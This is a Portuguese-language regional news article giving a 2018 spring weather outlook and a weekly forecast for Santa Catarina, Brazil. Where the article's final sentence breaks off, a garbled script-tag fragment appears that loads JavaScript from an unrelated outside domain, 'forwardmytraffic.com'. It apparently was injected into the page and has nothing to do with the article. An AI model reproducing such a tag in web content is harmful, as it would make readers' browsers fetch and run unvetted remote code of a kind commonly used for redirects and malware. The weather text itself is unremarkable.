InícioDestaquePrimavera de 2018 terá temperaturas acima da média em Santa Catarina

Primavera de 2018 terá temperaturas acima da média em Santa Catarina

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Setembro inicia com dias mais frios, possível formação de geada e temperaturas baixas, porém a previsão é que esse quadro mude, a partir da segunda quinzena de setembro, se mantendo por outubro e novembro com temperaturas acima do esperado.

 

Os próximos meses também podem trazer nevoeiros, associados a nebulosidade baixa, com redução de visibilidade. Atenção: durante a primavera, que inicia no dia 22 de setembro, é comum que, em áreas costeiras, o nevoeiro marítimo estenda-se por mais tempo, começando a noite e indo até parte da tarde do outro dia.

 

A previsão para as chuvas durante a primavera é na média, com distribuição irregular no trimestre e nas regiões do Estado. As regiões Oeste e Meio-Oeste recebem chuvas mais intensas.

 

Não esqueça: na primavera aumenta a incidência de temporais com granizo e ventania para Santa Catarina. E até outubro ciclones extratropicais próximos ao litoral sul continuam acontecendo com frequência, trazendo perigo às embarcações, com vento forte, mar agitado e ressaca.

 

E como fica esta semana?

 

A segunda-feira começou com chuva e tempo encoberto em todo o território e, principalmente no interior, o termômetro marca temperaturas baixas, especialmente no fim do dia. O sul e o litoral podem ter ventos de fraco a moderados, com rajadas mais intensas.

 

Para os outros dias o tempo passa a ser encoberto, com aberturas de sol ao longo do dia, exceto na quarta-feira que será firme e ensolarada. As temperaturas tendem a ficar mais baixas, até quinta-feira, 06.

 

Atenção para as regiões do Litoral e Vale do Itajaí que podem ter chuva fraca na madrugada desta terça, 04.

 

As regiões do Alto Vale, Florianópolis Serrana, Oeste e Planalto devem se preparar, na quarta-feira, 05, para temperaturas mais baixas na madrugada e no amanhecer de quarta-feira, com boas chances de geada.

 

Para o feriado, no dia 07, as temperaturas estarão em elevação. Todas as regiões terão o predomínio do sol e a região norte terá mais nuvens. O planalto sul tem chance de geada isolada na madrugada e o Litoral possíveis rajadas de vento.

 

Tendências climáticas entre os dias 08 e 17/09

 

Entre 08 e 17 de setembro a maior parte dos dias vai ter tempo seco, sem chuva significativa, com sol e temperaturas mais elevada. No fim deste período as temperaturas voltam a diminuir.

 

A chuva volta a aparecer, em torno do dia 14, quando uma nova frente fria passa pelo Estado…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.